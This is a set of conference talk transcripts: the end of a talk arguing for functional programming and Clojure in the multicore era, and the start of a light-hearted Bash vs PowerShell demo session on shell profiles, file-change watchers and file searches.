If I were to put the call to roll there in the second example, I doubt it would. If I were to put the call to score here, it would probably pass. But in the second one, well, it would pass too because it didn't do anything. Which of these two is simpler? That's the stateful version with the finite state machine in it. This is the functional, quasi-functional version. Which of those two is simpler? It turns out the functional version is much simpler. Which one is faster? Probably the stateful one is faster. Probably. Because it's doing less work. It's saving state, but it doesn't have to squirrel away all those variables. I'm not sure I haven't measured them. Probably not a huge difference. Which one is more thread safe? The functional one is much more thread safe. There's hardly any variables to get confused in there, but the non-functional one has that state variable. And if you had multiple threads calling roll, it would get pretty interesting. Which one uses more memory? The functional one does. It's got to save all those rolls up in a list before it can process them all. And that's one of the issues. What do we know about memory? It's cheap. How cheap is memory? I got a thumb drive here. What is it? I don't know. Probably 5 gigabyte. No, it wouldn't be 5, would it? 8 gigabytes? Maybe 8, maybe 16. I really don't know. I don't use it. I just keep it in my pocket because it's fun to have 8 gigabytes in your pocket. 8 gigabytes in my pocket. How many bits is that? 64 billion bits in my pocket. How did that happen? Because memory didn't always used to be cheap. We've got lots of it. We have virtually infinite amounts of memory nowadays. This machine here has a half a terabyte of solid state memory. When's the last time you saw a rotating disk? Does anybody in the room still have a rotating disk in their laptop? Of course, all of you have laptops. Yeah, oh, there's some rotating disks over here. I'm so sorry. If I'd asked that question a year ago, about 10% of you would have put your hands up. If I'd asked that question two years ago, half of you would have put your hands up. If I'd asked that question five years ago, everybody would have had their hand up except for one person and we would have all hated him. Memory has gotten cheap, absurdly cheap. We are filthy rich with this stuff. We are wealthy beyond belief because memory is pouring out of every orifice of our bodies. It's unbelievable how much memory we have and it's dirt cheap, hundreds of dollars for a terabyte. That's absurd. It didn't used to be that way. Who knows what that is? That's memory, core memory, core memory of the 1960s. Every one of those little donuts you see there is made out of iron. Every one of them had to be put into that network of wires by hand. There was no machine that could make core memory. It was woven on a loom by human beings, bit by bit by bit. It was frightfully expensive. I used to purchase this when I was a teenager. I would get army surplus core memory for hundreds of dollars for a thousand bits. I once purchased a solid state memory rack of 512 bits. It cost me $512. 64 billion dollars worth of memory when I was a teenager. We used to do bizarre things like try and figure out how to store bits on rotating memory surfaces. This is an old disc. Look at that thing. It was 14 inches across. It had, I don't know, a dozen platters. You wrote bits on the top and on the bottom of each platter. The heads would slide in there and they'd right on the top and they'd right on the bottom. 
The heads had to move in and out to find the different tracks on the disc. These things would spin at about 3600 RPM. That's a drum. Look at how inefficient that is. We would write on the surface of that drum. This is an old DECtape. We used to write on the surface of mylar tape impregnated with iron, magnetic tape. That's an old CRT memory which used the persistence of the phosphors to remember bits. If a phosphor point was glowing and you hit it with the electron beam, it would impede the beam and you could detect that with the amount of current you put into the beam. You could tell if a point was still glowing. Absurd kinds of memory things. Nowadays, of course, it's dirt cheap. Functional programming was invented in 1957. Before OO, when nobody had even thought of OO. Before structured programming, when Dijkstra had not yet written his paper about goto being considered harmful. Yet in 1957, we were already doing functional programming. Functional programming was the first of the three major paradigms to be invented. The last to be adopted, oddly. Why? Because memory was too expensive to make it practical. I mean, do you remember when we worried about that? But that's changed. We don't worry about memory anymore. Memory is too cheap to worry about. We throw it away in megabyte lots. We think of a megabyte as infinitesimally small. So why should we change how we program? Should we change how we program, given that memory is dirt cheap? Well, probably we should. Functional programs are simpler. You can prove this to yourself by writing a few. By the way, it takes much longer to write a line of functional code than it takes to write a line of nonfunctional code. But you wind up with far fewer lines of functional code, oddly enough. And the amount of time spent programming turns into a smaller amount of time because you don't have to worry about the state of a variable. So it makes them easier to write, although it doesn't feel that way, because every line you have to think about much harder. And yet in the end, the functional program is easier to write. It's easier to maintain. Everybody says this about everything, right? It's always easier to maintain. But it actually is. And why? Because of that. There are no temporal couplings, no side effects, no worries about what function to call before any other function or what function must be called after some other function. How many of you have debugged for weeks only to find that the problem was two functions that were called out of order? And you swapped the two and the system started to work and you don't know why. These two functions had to be called in this order. They just do for some reason. This is not an uncommon debugging scenario. In a functional program, that disappears. I said here that there are fewer concurrency issues. In a purely functional program, there are no concurrency issues because there are no variables. What is it that makes a program not thread safe? Side effects. Two functions trying to create a side effect. The two of them collide because of thread swapping and they improperly modify the side effect. If there are no side effects, if there are no assignment statements, you can't have thread problems. Why did I say fewer? Because in most functional programs, there is a portion of the program, a well-isolated portion of the program, which actually does do some assignment. And in that portion, you can get some concurrency issues, but in the vast majority of the code, you don't.
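To make that claim concrete, here is a small Clojure sketch (illustrative, not from the talk): a pure function returns the same value for the same argument every time, and because there is no shared state to corrupt, handing it to many threads at once is safe.

;; f is pure: no assignment, no side effect, so this assertion can never fail,
;; no matter when or how often it runs.
(defn f [x] (* x x))
(assert (= (f 10) (f 10)))

;; And because there is no shared state to collide over, spreading the same
;; function across threads needs no locks: pmap is simply map, in parallel.
(def results (pmap f (range 1 1000)))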
So we can get a lot less concurrency problems if we're using functional programs. Has anybody debugged a race condition for a month and then given up and said, well, just reboot the thing every once in a while? You never have to ask. Think about this, right? You're in the middle of a debugging session. You're sitting there. You've break pointed your way deep down into the code and then you ask yourself, what the hell is the state of the system? You never ask that. In a functional program, the system has no state. What you're looking at here is Moore's law. From 1970 to 2010, the number of transistors in a chip has been going up at, notice this is a log scale. So at some doubling rate, which people usually say is about 18 months. So every 18 months, the number of transistors on a chip doubles. Here's the clock speed. That's this dark blue line. And look at what happened here. Right about 2003. It went flat. Do you remember 2003? We got up to three gigahertz clock rates. And the yields were bad. The power was bad. We dropped on about two and a half gigahertz and it stayed there for 10 years. For the last 10 years, we've been sitting at two and a half gigahertz and it doesn't look like it's going to change. There's a possibility of some new materials that might make an incremental change in the clock rate. But not the geometric growth. This growth here is gone. We're not going to see that continue up here. It's folded over. But the number of transistors on the chip has not. The density has continued to grow. Now that's going to fall over too. Probably pretty soon. Because we're down to about 20 atoms in a wire. So there's only so much further you can go. But for the moment anyway, we continue to double this density number. And that has given the hardware engineers the ability to do more cores. How many of you have four cores in your laptops? How many of you have more than four? Don't fall for the hyperthreading thing. They'll tell you there's eight cores on there. There's not eight cores on there. Four. And they do this lie they call hyperthreading. Who's got true eight core? Yeah, okay. Good. I recently bought a 12 core machine for my daughter. Actually that was three chips with four cores each. But they still share nicely. Notice what's happening here, right? We're multiplying cores. Why would we multiply cores? Because we want to keep increasing throughput at some rate like this. Cost per cycle. Dollars per cycle. We want to increase this by this rate. But we can't do it with clock rate anymore. So we do it with cores. And the hardware engineers have started making some very bizarre tradeoffs. Do you know all that cashing stuff they used to put in the chips? The L1 cache and the L2 cache and the L3 cache and all that pipelining goop they used to do to squirrel away the instructions that were about to be executed and they'd flush that if you did a jump. You know all that stuff. They're ripping all that stuff out. They're going to make the processors slower. They're just going to put more processors in. So as we add more and more cores, the individual cores will slow down. But the throughput of the chip goes up. If you can take advantage of those cores. How do you take advantage of those cores? How do you do that? How good it we are at writing threaded code? Now, multi-threaded code is code which operates one instruction at a time. The processor is still a linear processor. The operating system tells one process it can go and the operating system is like a mother. 
It watches over the process as it runs. It makes sure the registers are loaded before it runs. When it tells it to stop, it grabs all the registers and squirrels them away and puts the process away in a nice place and then gets the next process out and unpacks the registers and lets it run for a while and it takes nice care of the process. There is no mother when you've got multiple cores running because now you have simultaneous execution, not concurrent execution. You've got four cores, you've got four instructions running simultaneously and they're all hitting the bus and they're all angry animals scrapping for that bus. They want that bus, they want their bytes, they say, give me a byte, here, take this byte, give me a byte, and there's no operating system to hold them off and make them behave nicely. So we programmers who have grown up with the nice operating system that lets us use our threads nicely, and we still can't do that well, are now faced with the jungle of the bus. And how many cores will we have to deal with? We have four now in most of our chips, some of the chips will have more. If I come back here in two years, your laptops will have eight. If I come back in four years, your laptops will have 16. If I come back in ten years, your laptops may have 512 cores. How are you going to write programs? How are you going to write systems that behave well with 1024 cores? How are you going to get the maximum out of your machine when you've got 16384 cores? How are you going to do that? And you may think, well, the operating system will handle that for me. I don't think so. I don't think so. I think the operating system folks are going to go, hey, programmers, this is your problem. So we programmers who have for the last 60 years lived in this fantasy world of one instruction at a time are now facing the real world. And the real world is the world of competing cores on a single memory bus. And we're going to have to deal with that somehow. And maybe one of the ways to deal with that is to give up the assignment statement, walk away from the assignment statement and never use it again except in very disciplined environments. Maybe all of us have gotten addicted to assignment and we're going to have to break that addiction. If these two Fs are executed on separate cores, it doesn't matter. So long as there's no state change. So I can take my function, the same function, executed on multiple cores. So long as there's no state change, I'll get the same results. This is why these languages have suddenly become important. Anybody noticed that these languages, you know, five years ago you didn't hear much about a functional language? Why have these languages suddenly become important? It's because of this multi-core problem. Everybody's trying to figure out how to solve the coming problem, the freight train that's on the tracks ready to run us all over. And out of this has come a number of languages. Some of them are old. These languages are very old. Erlang is becoming very popular now, a functional language, very interesting in the high-reliability market. It's possible to write very high reliability functions in Erlang because they've got a very good recovery mechanism and it's a nice functional language. Who studied Erlang? This would be worthwhile. There's a couple of good books on Erlang. Just read the books, get an idea. Write a couple of lines of code and you'll see what's going on in this language.
There's another language derived from Erlang called Elixir, which makes Erlang look a little bit like Ruby. Who's a Ruby programmer here? Ooh, one guy. One guy. Wow. You guys are really convinced about .NET, aren't you? In the United States, a Ruby programmer can write a number on a piece of paper and find someone to pay him that number, because all the social networking companies are using Ruby on Rails and they're all convinced that they've got to have good Ruby programmers, so the market for Ruby programmers is going through the roof. That's a bubble. It's going to pop. I don't know when it'll pop, but right now, if you're a Ruby programmer in the US, you feel pretty good. Who's doing a little F#? This is the .NET answer. A reasonably functional language. I'm not horribly familiar with it but I've looked at it a little bit. Slightly hybrid, but you can do some functional code in it. Scala on the Java side, more of a hybrid language. What do I mean by a hybrid language? A hybrid language is a language that supports functional programming but allows you to do undisciplined assignment. If the language allows you to do undisciplined assignment, you can't really call it a functional language. I put Clojure down here in a special font and a special color because Clojure is a language which is functional; it's essentially Lisp. Who knows Lisp? All right, some of you do. How many of you are afraid of all those parentheses? Yeah. Okay, so here's the thing about the parentheses in Lisp. You know a function call in Java looks like this, or in .NET it looks like that. You've got this name of the function, open parenthesis, argument, close parenthesis. That's how you write a function call. In Lisp, what you do is you take that open parenthesis right there and you move it there, and now you know Lisp. That's it. There's no extra parentheses, same number of parentheses. It's just that funny little positional move, and it scares everybody to death. Then the convention of the Lisp programmers is to stack all the closing parentheses at the end of the line instead of putting them on separate lines like .NET and Java programmers do. But if you count them up, same number, no difference. That's the difference. Just move that parenthesis like so. I like Clojure because it runs on both the Java and the .NET stack. It sits on top of the CLR or the JVM. It's a very nice little Lispy language. There's some good conventions in it. It imposes strict discipline on assignment. It's possible to do assignment, but you cannot do an assignment in Clojure unless you, in effect, open a transaction. An assignment statement in Clojure is treated like a database operation. You have to open up something like a transaction that can retry, and then you can do your assignment. It detects collisions in threading space and it retries and makes sure that there's no threading problems. That's what a Clojure program looks like. It doesn't look that different from a Ruby program or a JavaScript program except, of course, for that open parenthesis which scares everybody to death. If you were to take that open parenthesis, just move it there or maybe there, it would look a lot better from your point of view. All I'm doing here is defining a function named accelerate-all which takes an argument named os, and it calls the map function and maps the function accelerate to the list of objects. Pretty straightforward stuff. This gets people crazy here. That's a function call right there.
It's the greater than or equal operator and then the two arguments and everybody wants to move that into the middle and they can't quite manipulate it in their brains to move it in the middle. It takes a little practice. Here's how you add. That's a function, the plus function. We don't have operators in these languages. We just have functions but we can use special characters for the function names. That's a plus function, adds those two. This is the divide function. It takes that, divides it by that. It's not real hard to figure out. What about OO? OO is procedure plus state, right? State is evil in the functional world. Does that mean that when you're writing functional code you can't be doing OO? The answer to that is no. You can be doing OO in a functional program. You just can't manipulate state because remember that OO is exposed procedure but hidden state. Remember we were supposed to be hiding all of our state in an OO program. All the variables are supposed to be private. You're not supposed to know those variables exist. It's possible to write functional programs using an OO style and not only are you hiding all the variables, you're also not changing any of them. All of the objects become immutable. Now you may think to yourself, yeah, immutable. That means I got to make copies. Every time I change an object I got to make a copy of that object because I can't modify the state of the object, and it turns out that these languages are actually very clever. The implementers of the languages understand that linked lists can have multiple heads and you can make a linked list look like two different lists by moving the pointer to two different heads. So you can modify a linked list without making a copy just by creating a different head, and they use this technique to make it possible to modify objects without needing to make a copy. The old object is still there, but it gets linked to the new version of the object by some very clever linked list manipulations which keeps the speed very high. In Clojure these are called persistent data structures: when you modify a data structure you do not destroy the old version. You just keep a new version. That should sound familiar to you. That's your source code control system. You modify your source code but you don't destroy the old version, and you have very clever ways inside your source code control system to make sure that you relink to the old source code if you want to. You can move back in time. They don't make copies of all that old source code. What they do is very cleverly store the differences in just the right way and maintain the pointers so that you can reconstruct the source code at any time. That's what these persistent data structures do. Remember that OO is a lot more than just state. OO is dependency management. OO is about managing the dependencies inside of an application so that high level concepts are independent and low level concepts depend on high level concepts. This is called dependency inversion. That dependency inversion can still be done in functional programming. In an OO program we use polymorphism to do that. In a functional program we can still use polymorphism. There's no reason that you can't have a function and when you call that function it dispatches to different other sub-functions based on some kind of type identifier. All of that can still be done. And Clojure as a language allows that to be done as well as the others.
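A few of the Clojure features just described, written out as small illustrative snippets rather than the speaker's slides: the accelerate-all example, prefix notation, a persistent vector that is never mutated, type-tag dispatch, and the transactional form of assignment mentioned earlier. The accelerate function here is only a stand-in so the snippet runs.

;; Illustrative snippets, not the slide code. accelerate is a stand-in.
(defn accelerate [o] (update o :speed inc))

(defn accelerate-all [os]
  (map accelerate os))

;; Prefix notation: the operator is simply the first thing inside the parens.
(>= 5 3)     ;; => true
(+ 2 3)      ;; => 5
(/ 10 2)     ;; => 5

;; Persistent data structures: conj returns a *new* vector. v1 is untouched,
;; and the two versions share structure under the hood instead of copying.
(def v1 [1 2 3])
(def v2 (conj v1 4))   ;; v1 is still [1 2 3]

;; Polymorphic dispatch without mutable state: a multimethod chooses an
;; implementation from a type tag carried in the data itself.
(defmulti area :shape)
(defmethod area :circle [{:keys [r]}]    (* Math/PI r r))
(defmethod area :square [{:keys [side]}] (* side side))

;; Disciplined assignment: the rare mutable reference is only changed inside
;; a transaction, which the runtime retries if two threads collide.
(def balance (ref 0))
(dosync (alter balance + 100))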
Functional languages can still have polymorphic interfaces. They all still need dependency management. None of that stuff changes. They all still need the principles of object-oriented design and the principles of dependency management. But they need something else. They need the discipline imposed upon changes of state. So a language like Clojure has special functions in it. Transactional memory that allows you to change variables but only in the context of a transaction. This discipline has to be maintained if you're doing a Clojure program. There's no locking. You don't block for anything. You just make sure you've got this nice transactional memory. Because locking requires superpowers. It's difficult to know when to lock and when not. Has anybody debugged an application horribly, only to find out that you forgot to lock somewhere? Locking requires superpowers. Let's not use them. Locking means that you have side effects and you're trying to lock around those side effects. And with that I think I'm going to... I had a lot more to talk about. But... With five minutes left I think I'll open it up for questions. Are there any? You're going to have to holler and put your hand up really high because I can't see anybody. Yep. Memory is cheaper but what about cache misses? So we do have the problem now that we've got all this caching in our processors but the hardware guys are ripping all the caches out. All those caches are going to go away. All those hardware caches are going to go away. Now we still have software caches and yes, the more memory we use in our lists and the more memory we use in our persistent data structures, the more we're likely to have some issues there. Functional programs can be a little slower. Not much. A little bit slower because there are these funny linked-list structures that you have to be walking through. But the kind of time difference is fairly small, and if we're talking about multicore, well then the time difference is almost irrelevant. Because we're trying to find a way to program with 1024 cores; if that costs us 2% for each individual core, it's not much of a cost. Anybody else? Do I see a hand somewhere? It's hard for me to see. Okay, I don't see any hands. Oh oh oh, one guy, one guy. So the question is how do you structure your program, because now I have nice objects that I can put my functions into. How do I structure it now? And the answer is the same way. You still have data structures. You still have gatherings of data and functions that operate on those gatherings of data. The difference is that you don't change any of the variables inside those gatherings of data. In a good functional language there is a way to create a suite of functions that operate on a particular kind of data structure. It looks like an OO language in that sense. Clojure has that facility for example. You can create records and inside those records you can put functions and those records can behave polymorphically just like methods in classes, except that none of the variables in the records can change. You have to create new objects, even though you're not actually creating new objects. It looks to you like you're creating new objects and you can maintain state that way. Alright, I think that's enough. Thank you all for your attention. I'll see you another time.
|
Why is functional programming becoming such a hot topic? Just what is functional programming anyway? And when am I going to have to know about it? In this talk Uncle Bob will walk you through the rationale that is driving the current push towards functional programming. He'll also introduce you to the basics by walking through some simple Clojure code.
|
10.5446/50863 (DOI)
|
Is it working? Yes, I think it's mine, it's working as well. All right, good. All right, let's start. Welcome, welcome, Amaran. And as you know, we're going to have a battle, and so there will be things, there will be blood, there will be swearing, no, we won't. We'll try to be nice, at least a little bit in the beginning. Do you want to start? We can start, and then we can switch. Sure. So, I will be representing PowerShell, and this is my name, and I'm working with Foshe, and I've been a PowerShell enthusiast for quite a while. It's called Addict. Addict, PowerShell user, whatever. Once you get into it, it's hard to stop from there. Good, all right. All right, so, and you should probably say... I'll do that, just could you... We have this fancy thing, we have to push the button. Yeah, now it's my turn. So, this is me. I'm going to be representing Bash, and while I have to say, I have been addicted to Bash for, I don't know, over 10 years, 15 years probably, so, yeah, well, and I work at Compitose, and I'm going to try to show you some cool stuff about Bash today. So, there is one thing. We need your votes. We really need your votes. We need your tweets. So, basically, what you have to do is, what's there, you just say, and this here, slow, and then you say Bash, or... PowerShell. PowerShell, and whatever you want. So, basically, we're going to be looking for those two hashtags. Why you'll see later on, and how. All right, I'll switch over here, so you can quickly take a look at the PowerShell tag. This is what you want to vote, of course, and vote smart, vote for PowerShell. No. So, are you guys ready? Yay! Come on. All right. And then we kind of thought that this kind of battle, it has to be like, kind of, you know, within real, like, battle traditions, so we should kind of present in, like, in the left corner, there is a Herald, representing PowerShell. Yes. And in the right corner, representing Bash. It's me, Rustam. Yay! Thank you. All right. Let's kick things off. So, I'm going to go ahead and start, because I already have the computer online here. Perfect. Let's see. You start. I'll show the good parts. Do the duplicate screen thing here first. So, all right. This is a nice little Windows screen. Oh, and the foils. Okay. So, I'm going to go ahead and start PowerShell. Ice. And I'm going to render that admin, because I want all the privileges I can get. So, ah. Your shell is ugly, and it looks like MS-GOS. Well, since there are microphones, I'm going to repeat that. Totally. I mean, no, no, like, I have nothing to do with that. I'll just repeat it. He just said that his shell is ugly, and it looks like DOS. Yeah, well. That's for the record. Well, at least I can change it quite easily, compared to what you can do in Bash. I mean, I can just change the colors here. Yeah, but you need to. He can change it to black and white. So, it looks like DOS. Basically, I have all the options I need. So, I can change it from not looking like DOS. Anyways, so, I'm just going to kick everything off. So, I'm just going to go ahead and say, do awesome. And we can just admire the power of the shell. It's good. It's so wonderful, isn't it? So, this is a little memory stream that's actually writing to the system beep. The nerd factor of this talk, just skyrocketed. What do you got in Bash? Well, I mean, now we know who the dark side is, right? So, I'm going to go for safe stuff, and just like with kittens and animals and stuff like that, right? So, I'm going to show you some, wait a second. 
I'm going to show you something really nice. Can you see the, oh, you can't. Good. That's a yelp. It's another feature of Microsoft Windows. It kind of switches this stuff for you. That's the Linux yellow screen of death, almost. Yeah, well, it's nice, you know. Let's see. Can we... Technical. We have some technical difficulties. We go for duplicate. It's a power point changing the screens and stuff. So, I have something really nice. I have something like that. Welcome to NDC. Oh, isn't it nice? Isn't it cute? Yeah. Yeah. It's pretty cool. It's the light side. It's the dark side has cookies. We don't. We have cows and stuff. Yeah. And kittens. All right. So, what? Do you want me to show you something? Something more awesome, I mean. Okay. Let me start you showing you some cool stuff. And in this shell, let me just go to... What was that? What happened? Something is wrong. Something is wrong. Something kind of looks weird. It looks like a kernel panic. Oh, wait. That wasn't... Wait, PowerShell rocks? Come on, dude. We're in presentation. It looks like you're already completed. I mean... Come on. I trust you not to do that kind of stuff. I don't know. I'm innocent. Yeah, right. You're innocent. I kind of don't believe that. I mean, my computer wouldn't do that kind of things. Of course it would. Yeah, right. Okay. Well, okay. Let's see. Well, I mean, the thing is that... Let me just fix it. His screw up a little bit. I don't know what you're talking about. Well, he's still... Yeah, right. Yeah, okay. Well, you know, let's start with the profiles. Since we're there, just let me show you just a little bit of profiles and stuff and see how actually that kind of things could be done. We have... In Bash, you have profiles which are... There are like different places and there is one main one which is at... It's at... Can you see or should I increase the font? I can do that. I can do this and I can actually go full screen on this. It looks so much cooler. Is it better now? More? Like this? All right. Let me show you. Oh, let's go for like... The main one, the main profiles thing is here. Oh, wait. It's in... Oh, it's in here. Profile. So this is kind of the main thing that's for all users and stuff and then where you can define things, you can define your own variables and it kind of gives you the flexibility of adding your own functions, your own stuff. We'll look at more what kind of stuff later, but basically this is kind of lets you create shortcuts for your things, the things you type, the things you type more often. And there is also a local version of that which is for your user which is there, which is kind of your own customizations for just that user that is logged in and then you see I have my own customizations and stuff added there which I kind of going to use for later on. That thing is placed, it's at your home slash your user name. I have a fantastic user name. I'm really proud of it, by the way. It can get really critical. It can get really scary sometimes. I did type it a couple of times instead of the login window, I tucked it in the shell. I stopped in time so no harm is done, but yeah, it kind of could be a little bit different. Another cool thing, I mean what you can do, what you can put in those profiles is functions. So you can actually create like a easy tiny little function like, well, the example I usually like to show is the one like how often do we like say CD to something and then go to CD to something else and then you take LS there to see what's inside, right? 
What you could do is to create a function called CDL that would do both things at the same time, right? So then you can just do like this and then you say I want to go to CD to something which is, and that something is the first parameter that the function gets. And then you can say like LS minus, I don't know, LA, something like that just to see the contents of it. And then you can just go like CDL and NDC battle. It will do both things. So you go there and show the stuff. What do you get? Do you have some kind of stuff like that? Yeah, definitely. Show something cool and powerful. Okay, so if you took a mental note of the function in bash, it's really ugly. It's really ugly. I mean, you're passing parameters with a dollar sign. So in the PowerShell, I could just do a function, do something, and I could pass a name parameter. And then I'm actually able to use this for later. So I could say do something and then get auto completion. So it's pretty neat. It actually helps me to write better functions. Well, you have auto completion in bash as well. It's called tab. But it's not as pretty. So, he spoke a little bit about profiles. And the thing that just happened to your shell couldn't happen to mine because basically, I could set up a monitor to listen for events on my profiles. So PowerShell has the same concept of profiles. They're just stored more centralized. So basically, we have a variable called profile. There's just one one up. No. Oh, no, there's multiple profiles. But here it's all grouped together so you can have a profile for all users, all different hosts. You can have one for the current user, all hosts, and you can have for different variants of that. It's actually cool. It's a so you don't have to remember any paths in particular. You can also print them if you want. So I'm just going to go ahead and show you my profile. I'm going to say current user, current all hosts because I have something in this file. So basically here, I've set up a customized profile and I've added some neat little tricks like new item. I've added a default parameter. So every time I'm trying to create an item, I don't have to type dash item type file every time. I can just say new item and then it creates a file for me. So it's just small details that makes life a little bit more easy. But for the monitoring part, PowerShell has a really fancy way of registering events and listening to events. And since you're already based on the full.NET stack, you can basically use any component you want. So what I did, oh, I've done this earlier some many times because it's quite useful in many projects. Let's see, I'm going to go ahead and grab one of my scripts. Is it big enough? It's readable. I can probably make it a little bit smaller if I can read it. A little bit smaller, yeah, I guess that should be fine. So basically I've made a function to watch for changes and this one takes either a directory or a file. And there's some logics, there's some if sentences, which is quite readable compared to what bash is. You're right. But basically what this does is creates a file system launcher and it registers for the events and then it pushes them. So every time a file changes, I'm actually sending an email. Okay. So if I wanted to use the script, I could basically just say, what register, what did we call it? I have up here it's watch changes. So I could say watch changes, path, profile. Yeah, let's do it. Current user, all hosts. And let's save this and run this. 
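Neither function is visible in a transcript, so a hedged sketch of each. The Bash cdl just described is essentially cdl() { cd "$1" && ls -la; } dropped into ~/.bashrc. A Watch-Changes function along the lines being demonstrated can be built from a FileSystemWatcher plus Register-ObjectEvent; this is an approximation of the demo, not the presenter's actual script, and the addresses and server below are placeholders.

# A rough sketch of a Watch-Changes function like the one being run above.
# FileSystemWatcher raises the events, Register-ObjectEvent subscribes to
# them, and the action mails a notification.
function Watch-Changes {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string] $To   = 'me@example.com',
        [string] $Smtp = 'smtp.example.com'
    )

    $file    = Get-Item $Path
    $watcher = New-Object System.IO.FileSystemWatcher $file.DirectoryName, $file.Name
    $watcher.EnableRaisingEvents = $true

    Register-ObjectEvent -InputObject $watcher -EventName Changed -MessageData @{
        To = $To; Smtp = $Smtp
    } -Action {
        $cfg = $Event.MessageData
        Send-MailMessage -To $cfg.To -From 'watcher@example.com' `
            -Subject 'File changed' -Body $Event.SourceEventArgs.FullPath `
            -SmtpServer $cfg.Smtp
    } | Out-Null
}

# Used roughly the way it is in the demo:
Watch-Changes -Path $PROFILE.CurrentUserAllHosts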
And you can see it's writing some debug info because I put debug preferences on. And if I now try to change my profile, just say save, it's sending me an email. So it's pretty neat. So I can't actually pay you back, right? That's what you're telling me. Yeah, pretty much. At least I'll know you changed something. Oh, interesting, interesting. You know, I have to tell you something. I kind of didn't want to tell you earlier, just a couple of minutes ago. I don't know if you guys were quick enough to see what's in that folder. There is a tiny little file. It's green. Not the cuckoo clock, that's something else I'll show you later, but it's also green. You do feel the theme: green, green papers, lots of green, right? Well, okay. Anyway, the thing I didn't tell you is that I have a tiny little script. Let's have a look at it. I have it open over here. So what do I have here? I think it's pretty much the same. Well, actually, it's a little bit better than what you had. Really? Yeah, I think so. The thing is that we start with inotifywait, which is pretty much the same idea: it goes and watches for different events on a file. Then I said it should listen all the time, that's the -m, monitor mode, and the event type is close_write, so the file has been written to and closed. Then, just for fun, I added some formatting for the timestamps and things like that, so you can basically ignore what's in --format and --timefmt. Then I say which folder it should monitor, and it just goes on, right? Every time something happens it kicks off an event, and then something fun happens. One part just echoes stuff, blah, blah, blah. But I really like this line. Do any of you guys know what streamer does? Well, you can probably guess. It takes control of my webcam and takes a snapshot. So I'm not just sending an email, I'm actually taking a picture of the guy. So let's see. I think I have a picture here called intruder.jpeg. So who is that again, huh? It must be manipulated. It must be Photoshopped, right? Yeah, of course. All right, let's go with that. Well, even pictures don't help. Okay, I'll try to think of something cool for next time. Anyway, if we just go through the rest of it: it takes a picture, then it encodes it to make it email friendly, then it writes that your file has been changed, says which file and so on, and sends an email saying your profile has been changed, to my email. So now I'm probably going to get a lot of spam. It wasn't supposed to be my real email, but anyway, be nice, guys. So that's kind of it. Monitoring is a good thing. And when you put the joke aside, it actually has some useful stuff to it. What you can do with monitoring, the thing we showed in both PowerShell and Bash, is use those kinds of commands not just for fun, like monitoring your .bashrc file or profiles or whatever.
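A stripped-down sketch of that inotifywait watcher, with the watched path, the mail command and the address as placeholders rather than the speaker's actual script:

```bash
#!/bin/bash
# Watch one file and react every time it is written and closed.
WATCHED="$HOME/.bashrc"

inotifywait -m -e close_write --timefmt '%F %T' --format '%w %T' "$WATCHED" |
while read -r file timestamp; do
    # Grab a webcam snapshot of whoever is at the keyboard.
    streamer -f jpeg -o /tmp/intruder.jpeg

    # Encode the picture so it is email friendly and send the alert.
    {
        echo "Your file $file was changed at $timestamp"
        base64 /tmp/intruder.jpeg
    } | mail -s "Profile changed" me@example.com
done
```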
If you can actually use it for logging for something like you have a tiny system that, and you don't want to have full scale logging some environment that would just do like crazy stuff and monitor the heck out of it, you just have tiny little watcher that would actually go and watch through the log file. It would just look at the contents like all the time and look for a special kind of exception, which is really bad and really critical, and would just send an email or something. So you can actually do something useful stuff to that. And that's what we're going to do. We're going to show you through this kind of over presentation through this battle. We're going to show you, first going to show you some fun stuff, and then we're going to kind of try to see and to turn it around and show you actually the useful, how useful it actually can be in your everyday life. And then you can decide what you feel is the best way to do it. I mean, if you're stuck on Windows, why do you want to use Bash? Because you have SIGVAN. Because you can. You have Bash from Linux. No, I don't like that. I kind of reject that. Alright. So monitoring one folder for changes is quite useful. So if you want to parse logs, you want to listen for errors, or maybe you have a system that ships a lot of files into one folder. You might want to ship them somewhere. It can be useful in many, many scenarios. Yes, it is. It is really good. It is actually very good stuff. The other good stuff that could be useful for, actually, you can use it together with that, is actually looking for, it's like searching for files. I mean, that's kind of thing that you do quite often. I mean, I'm sitting on a Linux box, like on a server, whenever I have to build something or something, and then something goes wrong or whatever, and I have to search for the file, and I have to find that, and I have to look for contents in it. And let's just show you really, real quick. I mean, we don't have that much probably time, but let's just show you real quick how you can search for files, and then look for stuff and replace them just on the fly. You want to start? Now you can go ahead. Okay, I can. Alright, since I have the machine, let's do this. Oh, it's fantastic. It's awesome. It's like sparkly unicorns all the way. Yeah, we don't like sparkly unicorns. And you don't like them. The rest of the people like, right? How many like sparkly unicorns? Yay! It's not so many. And kittens. Kittens is important, right? Yeah. Alright, let's see. Let's see for something like searching for files. There is a really, really, really powerful command that's called find. I want to show you one thing. It's manual pages. If you want to see what command does, what kind of description it has, whatever. The documentation of that thing, just go there. And man page for find is horrendous. I mean, it's really long. It's like it's miles long, and it has lots and lots of functions, and it does lots of crazy stuff. So if you don't know how to use it, if you're not really familiar with that, do that, check it out, and see how it actually powerful it is. And it's quick, actually, too. It's really quick. So simple stuff would be like saying something like find catalog, which is like here. And I would say give me something that has name into there something. Let's see if it works. Yeah, it does. So I just looked through it through the folder, and then I look for intruder file. 
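A few illustrative find invocations along the lines of what is being described here (the directory name is made up):

```bash
find ~/ndc-battle -name 'intruder*'               # by file name
find ~/ndc-battle -iname '*.xml' -size +100k      # case-insensitive, larger than 100 KB
find ~/ndc-battle -mtime -1 -type f               # regular files changed in the last day
find ~/ndc-battle -name '*.log' -exec gzip {} \;  # run a command on every hit
```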
I have also copied, both of us have this folder, this scary folder, it's one gig of log files and XML files, which we kind of use for benchmarking stuff. I kind of ripped it from Microsoft program files and Windows files. Just basically parsing all the logs and XMLs. So it's kind of artificially made folder. Yeah, so it's quite the neat little directory structure just to have a demo. So you can basically what you can do is like config and then look for something that contains stars with web. Oh, that would be a lot probably. Like this, I guess. Yeah, just a web star. Yeah, look, it went through like a gig of files like this and just found everything and show you the path and everything. What you can do, you can actually, if you want to look for something inside those files, you can actually use some stuff like grep. This is the simplest way to do that. Minus r just would go recursively. And then we can say, well, I don't know, let's go for web config. Well, we probably lost. Yeah, it did. Looked like an error. No, just the red one is just the hit. So, yeah, this is simple stuff, right? That's the easy stuff. Can you do that? I mean, this is basic stuff that you would probably have to do every day, at least like quite often, right, for some automation. So show us some partial magic. How can you do that kind of stuff? I mean, let's start easy, right? Sure, let's just give people some base start. Yeah. So as in Bash, you have basically the same functionality here, but instead of using something like find, we have an easier way. So you can always, yeah. So for the people that use the Bash, you have ls, right? Basically in PowerShell, ls is an alias to get child item. And this is a really, really powerful command blitz. So 